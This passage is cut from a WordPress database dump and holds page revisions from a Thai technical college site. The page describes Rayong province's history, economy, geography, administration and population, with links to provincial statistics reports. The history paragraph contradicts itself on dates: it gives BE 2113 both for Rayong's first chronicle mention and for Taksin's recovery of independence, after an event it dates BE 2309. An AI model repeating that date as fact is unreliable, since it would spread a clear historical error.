class=\"article-rel-wrapper\">\r\n\r\n<span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=910:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2552</strong></a></span>\r\n<div class=\"article-rel-wrapper\"><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=764:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2551</strong></a></span></div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2019-02-20 11:24:42', '2019-02-20 04:24:42', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(5207, 3, '2019-02-20 11:32:31', '2019-02-20 04:32:31', '<h2 class=\"componentheading\">ประวัติความเป็นมาของจังหวัดระยอง</h2>\r\n<div>\r\n\r\n ระยอง เริ่มปรากฎชื่อในพงศาวดารเมื่อปี พ.ศ.2113 ในรัชสมัยของสมเด็จพระมหาธรรมราชาแห่งกรุงศรีอยุธยา โดยมีประวัติดั้งเดิมตามข้อสันนิษฐานว่า น่าจะก่อตั้งเมืองขึ้นเมื่อประมาณ พ.ศ. 1500 ยุคที่ขอมมีอานุภาพเฟื่องฟูแถบดินแดนสุวรรณภูมิ นักโบราณคดีได้สันนิษฐานจากหลักฐานที่พบ คือ ซากศิลาแลงคูค่ายที่ยังหลงเหลืออยู่ในเขตอำเภอบ้านค่าย อันเป็นศิลปะการก่อสร้างแบบขอม โดยในสมัยโบราณ ระยองมีชนพื้นเมืองคือชาวซอง ซึ่งเป็นเผ่าที่อาศัยอยู่กระจายโดยทั่วไปในภาคตะวันออก ในประวัติศาสตร์ตอนหนึ่งได้กล่าวถึงเมืองระยองในปลายสมัยกรุงศรีอยุธยา ระหว่างที่กรุงศรีอยุธยาใกล้จะเสียแก่พม่าเป็นครั้งที่ 2 ในสมัยพระเจ้าเอกทัศน์ ในเดือนยี่ปี พ.ศ.2309 พระยาวชิรปราการ หรือ พระยาตาก พร้อมไพร่พลประมาณ 500 คน ได้ตีฝ่าวงล้อมทัพพม่า มุ่งสู่ตะวันออกมาหยุดพักไพร่พลที่เมืองระยอง และได้ปราบปรามคณะกรรมการเมืองที่แข็งข้อยึดเมืองระยองได้ จากความสามารถครั้งนั้น เหล่าทหารจึงยกย่องให้เป็น \"เจ้าตากสิน\" ก่อนเดินทัพไปยังเมืองจันทบุรี เพื่อยึดที่ดินในการกอบกู้อิสรภาพคืนจากพม่าได้ในปี พ.ศ.2113\r\n<h2><strong>ข้อมูลทั่วไปของจังหวัดระยอง</strong></h2>\r\n</div>\r\n<div> ระยอง..... เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศไทย ที่เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้ต่อหัวประชากรสูง เป็นอันดับหนึ่งของประเทศ เมื่อก่อนจังหวัดระยองจะเป็นที่รู้จักในฐานะเมืองแห่งผลไม้ดีของภาคตะวันออก ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้ง อาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากความเหมาะสมของสภาพดินฟ้าอากาศที่เอื้ออำนวยและสภาพภูมิประเทศที่เหมาะสม นอกจากนั้น ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม เนื่องจากมีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดก็เป็นที่รู้จักแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทยและชาวต่างประเทศ ฐานเศรษฐกิจที่สำคัญของจังหวัดคือเกษตรกรรม การท่องเที่ยว และอุตสาหกรรม จังหวัดระยองเริ่มมีการเปลี่ยนแปลงไปเป็นจังหวัดอุตสาหกรรม นับตั้งแต่การค้นพบก๊าซธรรมชาติในอ่าวไทย เมื่อปี พ.ศ. 2520 เป็นการเริ่มต้นยุค “โชติช่วงชัชวาลย์” และเป็นที่มาของ “โครงการพัฒนาพื้นที่ชายฝั่งทะเลตะวันออก” (Eastern Seaboard Development Program) ในปี 2524 ในช่วงระยะเวลากว่า 20 ปีที่ผ่านมานั้น ได้ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยอง เปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและการเกษตร ปัจจุบันรายได้เฉลี่ยต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1,143,740 บาท/คน ผลิตภัณฑ์มวลรวมจังหวัด (GPP) เท่ากับ 672,104 ล้านบาท โดยมาจาก สาขาการผลิตด้านอุตสาหกรรม กว่าร้อยละ 92 จังหวัดระยองได้นำข้อมูลด้านต่าง ๆ ทั้งด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์อื่น ๆ มาเรียบเรียงลงในหนังสือเล่มนี้ เพื่อให้ผู้ที่ได้อ่านหนังสือเล่มนี้จะได้รู้จักจังหวัดระยองมากขึ้น และหวังเป็นอย่างยิ่งว่าจะเป็นสื่อที่ช่วยส่งเสริม เผยแพร่และประชาสัมพันธ์จังหวัดระยอง ให้เป็นที่รู้จักกว้างขวางยิ่งขึ้น หากมีข้อบกพร่องประการใด คณะผู้จัดทำยินดีน้อมรับเพื่อนำไปปรับปรุงแก้ไขในโอกาสต่อไป <strong><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/images/stories/rayongdata60.pdf\">บรรยายสรุปจังหวัดระยอง 2560</a></strong></div>\r\n<div></div>\r\n<div></div>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>2558 <span lang=\"TH\">มีทั้งสิ้น</span> 688,999<span lang=\"TH\"> คน เป็นชาย 339</span>,333<span lang=\"TH\"> คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 349,666 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 271,460 <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,816<span lang=\"TH\"> คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 527.60 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>292.10 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 65.8 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 698,017 <span lang=\"TH\">คนในปี</span> 2561 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4 class=\"contentheading\"></h4>\r\n<h4><span style=\"color: #ff00ff;\"><b><a style=\"color: #ff00ff;\" href=\"http://rayong.cdd.go.th/project.html/JPT/JPT.htm\">ข้อมูลความจำเป็นพื้นฐานและข้อมูลพื้นฐาน</a> จังหวัดระยอง 2559</b></span></h4>\r\n<h4 class=\"contentheading\"><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%202558-2561.pdf\">แผนพัฒนาจังหวัดระยอง 2558 - 2561</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://klang.cgd.go.th/ryg/gpprayong.html\">GPP จังหวัดระยอง</a></span></h4>\r\n<span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=608&Itemid=199\"><strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง ปีงบประมาณ 2548-2558</strong></a></span>\r\n\r\n<span style=\"color: #ff00ff;\"><b><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1180:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2559</a></b></span>\r\n\r\n<span style=\"color: #ff00ff; font-size: medium;\"><b><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1159:-2558&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2558</a></b></span>\r\n\r\n<span style=\"color: #ff00ff;\"><b><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1134:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2557</a></b></span>\r\n\r\n<span style=\"color: #ff00ff;\"><strong><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1133:-2556&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2556</a></strong></span>\r\n\r\n<span style=\"color: #ff00ff;\"><strong><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1103:-2555&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2555</a></strong></span>\r\n\r\n<span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1047:-2554&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2554</strong></a></span>\r\n<div class=\"article-rel-wrapper\"><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1016:-2553&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2553</strong></a></span></div>\r\n<div class=\"article-rel-wrapper\">\r\n\r\n<span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=910:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2552</strong></a></span>\r\n<div class=\"article-rel-wrapper\"><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=764:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2551</strong></a></span></div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2019-02-20 11:32:31', '2019-02-20 04:32:31', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
(5208, 3, '2019-02-20 11:45:26', '2019-02-20 04:45:26', '<h2 class=\"componentheading\">ประวัติความเป็นมาของจังหวัดระยอง</h2>\r\n<div>\r\n\r\n ระยอง เริ่มปรากฎชื่อในพงศาวดารเมื่อปี พ.ศ.2113 ในรัชสมัยของสมเด็จพระมหาธรรมราชาแห่งกรุงศรีอยุธยา โดยมีประวัติดั้งเดิมตามข้อสันนิษฐานว่า น่าจะก่อตั้งเมืองขึ้นเมื่อประมาณ พ.ศ. 1500 ยุคที่ขอมมีอานุภาพเฟื่องฟูแถบดินแดนสุวรรณภูมิ นักโบราณคดีได้สันนิษฐานจากหลักฐานที่พบ คือ ซากศิลาแลงคูค่ายที่ยังหลงเหลืออยู่ในเขตอำเภอบ้านค่าย อันเป็นศิลปะการก่อสร้างแบบขอม โดยในสมัยโบราณ ระยองมีชนพื้นเมืองคือชาวซอง ซึ่งเป็นเผ่าที่อาศัยอยู่กระจายโดยทั่วไปในภาคตะวันออก ในประวัติศาสตร์ตอนหนึ่งได้กล่าวถึงเมืองระยองในปลายสมัยกรุงศรีอยุธยา ระหว่างที่กรุงศรีอยุธยาใกล้จะเสียแก่พม่าเป็นครั้งที่ 2 ในสมัยพระเจ้าเอกทัศน์ ในเดือนยี่ปี พ.ศ.2309 พระยาวชิรปราการ หรือ พระยาตาก พร้อมไพร่พลประมาณ 500 คน ได้ตีฝ่าวงล้อมทัพพม่า มุ่งสู่ตะวันออกมาหยุดพักไพร่พลที่เมืองระยอง และได้ปราบปรามคณะกรรมการเมืองที่แข็งข้อยึดเมืองระยองได้ จากความสามารถครั้งนั้น เหล่าทหารจึงยกย่องให้เป็น \"เจ้าตากสิน\" ก่อนเดินทัพไปยังเมืองจันทบุรี เพื่อยึดที่ดินในการกอบกู้อิสรภาพคืนจากพม่าได้ในปี พ.ศ.2113\r\n<h2 class=\"contentheading\">สภาพทั่วไป</h2>\r\n<div class=\"article_column column1 cols1\">\r\n<div class=\"\">\r\n<h3><strong><span class=\"important-title-blue\">ข้อมูลทั่วไปของจังหวัดระยอง</span></strong><